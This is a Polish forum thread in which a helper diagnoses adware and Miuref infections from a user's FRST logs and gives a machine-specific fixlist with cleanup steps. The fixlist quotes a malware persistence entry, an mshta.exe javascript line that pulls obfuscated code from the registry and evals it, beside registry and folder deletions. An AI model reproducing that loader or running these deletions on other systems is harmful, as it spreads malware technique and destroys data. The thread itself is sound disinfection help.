robertop Opublikowano 12 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 12 Kwietnia 2017 (edytowane) Od jakiegoś czasu komputer ponownie zaczął mi zamulać.Tym razem wypadło na eksploratora Windows, który się tnie aż za bardzo i zastanawiam, czy nie przypadkiem pozostałości po ostatnich wojażach z czyszczeniami nie są tego przyczyną.Główny problem polega na tym, że nie działa PPM - właściwości (tzn menu kontekstowe działa, ale nie pojawia się okno z właściwościami). Umieszczam logi FRST. Z góry dziękuję EDIT: Dodatkowo, podczas uruchamiania pojawia się taki błąd:Nie można załadować modułu "C:\Users\rober\AppData\Local\lbsoft\bassTrust.dll".Upewnij się, że plik binarny jest przechowywany w określonej ścieżce (oczywiście nie jest) lub zdebuguj go, aby sprawdzić czy występują problemy z plikiem binarnym lub zależnymi plikami DLL.Nie można odnaleźć określonego modułu Addition.txt FRST.txt Shortcut.txt Edytowane 13 Kwietnia 2017 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 13 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 13 Kwietnia 2017 System jest zainfekowany przez nowoczesne adware podstawiające fałszywą kopię przeglądarkę Google Chrome. Do tego dochodzą dwie infekcje Win32/Miuref (KLIK) oraz inna, niezidentyfikowana zakneblowana w rejestrze. Przypuszczalnie jest uszkodzona usługa winmgmt. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [] 1 HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\Run: [ibsoft] => regsvr32.exe C:\Users\rober\AppData\Local\Ibsoft\bassTrust.dll ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => -> Brak pliku SearchScopes: HKU\S-1-5-21-3797074174-2719608703-2427757124-1057 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Tooltony\Application\chrome.exe RemoveDirectory: C:\Program Files (x86)\Tooltony S3 dbx; system32\DRIVERS\dbx.sys [X] HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartupApproved\Run: => "YSPack" HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Classes\929e3: "C:\WINDOWS\system32\mshta.exe" "javascript:obxi5j9TR="QqmpimHi";dr6=new ActiveXObject("WScript.Shell");xvaC4eb2="I";Yng82J=dr6.RegRead("HKCU\\software\\aurgjr\\aclehngaac");Z4ob1mPdd="34b";eval(Yng82J);tHKOs1T="pxl0QBT";" C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cygwin\Cygwin64 Terminal.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\Kopia_Kopia_Lista_termin_0_oceny_koncowe305858052441186973\Kopia_Kopia_Lista_termin_0_oceny_koncowe.xls.lnk C:\Users\rober\AppData\Roaming\Microsoft\Excel\KALKULATOR%20DOCHODU305849803376288589\KALKULATOR%20DOCHODU.xls.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\rober\AppData\Local\Mozilla C:\Users\rober\AppData\Roaming\Mozilla C:\Users\rober\AppData\Roaming\Profiles C:\Program Files (x86)\Mozilla Firefox C:\ProgramData\Mozilla Reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s FindFolder: *Tooltony*;*Ibsoft* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 3. Zastosuj AdwCleaner z opcji najpierw Szukaj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). tooltony Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób raport z narzędzia Farbar Service Scanner (FSS) i zaprezentuj go na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) już bez Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
robertop Opublikowano 13 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 13 Kwietnia 2017 Wszystkie logi umieszczam w załączniku Addition.txt FRST.txt Shortcut.txt FSS.txt SearchReg.txt Fixlog.txt raport-malwarbytes.txt AdwCleanerC3.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się